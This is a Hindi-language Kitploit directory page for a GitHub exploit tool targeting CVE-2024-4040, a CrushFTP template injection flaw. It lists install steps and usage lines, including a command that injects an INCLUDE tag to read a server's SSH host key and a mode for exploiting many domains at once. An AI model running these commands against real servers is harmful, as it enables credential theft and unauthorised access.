Skip to content
KitploitKITPLOIT
उपकरणब्लॉग
जमा करें
उपकरणब्लॉग
जमा करें

हैकिंग, पेनटेस्ट और साइबर सुरक्षा उपकरण आपके सुरक्षा शस्त्रागार के लिए!

Kitploit हैकिंग, साइबर सुरक्षा और पेंटेस्टिंग टूल्स की एक निर्देशिका है। कमजोरियों को खोजने, सिस्टम का विश्लेषण करने, परीक्षण को स्वचालित करने और अपनी सुरक्षा को मजबूत करने के लिए नवीनतम प्रोजेक्ट अपडेट खोजें।

··फ़ीड·संपर्क·गोपनीयता·© 2026 Kitploit

टूल निर्देशिका

श्रेणियाँ

सभी श्रेणियाँ देखें
Loading categories
उपकरण/GitHubGitHub/gotr00t0day/cve-2024-4040
भेद्यता विश्लेषणशोषणवेब एप्लिकेशन शोषणजानकारी एकत्र करनाप्रमाणीकरणरिमोट एक्सेस टूल
GitHubgotr00t0day/cve-2024-4040

CVE-2024-4040

CrushFTP SSTI भेद्यता (CVE-2024-4040) के लिए शोषण जो प्रभावित सर्वरों पर अनधिकृत फ़ाइल रीड, प्रमाणीकरण बाईपास और दूरस्थ कोड निष्पादन सक्षम बनाता है।

रिपॉजिटरी देखें
8212 साल पहलेअभी तक समीक्षित नहीं

सबसे लोकप्रिय

सभी देखें →

हमारे समुदाय द्वारा सबसे अधिक उपयोग किए जाने वाले उपकरण खोजें।

सभी उपकरण खोजें

हमारे उपकरणों का संग्रह ब्राउज़ करें

सभी उपकरण देखें →
साझा करें

CVE-2024-4040

CrushFTP के सभी संस्करणों में 10.7.1 और 11.1.0 से पहले के संस्करणों में एक सर्वर साइड टेम्पलेट इंजेक्शन कमजोरी मौजूद है, जो सभी प्लेटफार्मों पर अप्रमाणित रिमोट हमलावरों को VFS सैंडबॉक्स के बाहर फाइल सिस्टम से फाइलें पढ़ने, प्रमाणीकरण को बायपास करके प्रशासनिक पहुंच प्राप्त करने और सर्वर पर रिमोट कोड निष्पादन करने की अनुमति देती है।

स्थापना

git clone https://github.com/gotr00t0day/CVE-2024-4040.git

cd CVE-2024-4040

pip3 instrall -r requirements.txt

उपयोग

root@kitploit:~
usage: CVE-2024-4040.py [-h] [-t TARGET] [-f FILE] [-d DOMAINS]

options:
  -h, --help            show this help message and exit
  -t TARGET, --target TARGET
                        target to scan
  -f FILE, --file FILE  file to fetch
  -d DOMAINS, --domains DOMAINS
                        file containing list of domains

# MAKE SURE YOU USE THE <INCLUDE> TAG OR ANY OTHER TAG TO EXPLOIT THE TARGET, SOMETIMES YOU DONT NEED ANY TAGS.

# Exploit a target

python3 CVE-2024-4040.py -t http://TARGET:8080 -f "<INCLUDE>ssh_host_rsa_key</INCLUDE>"

# Exploit a list of targets

python3 CVE-2024-4040.py -d ~/list.txt -f %hostname%  

विश्लेषण

कृपया इस एक्सप्लॉइट का उपयोग करने के बारे में बेहतर समझ के लिए ATTACKERKB ANALYSIS पढ़ें।

टूल डाउनलोड करें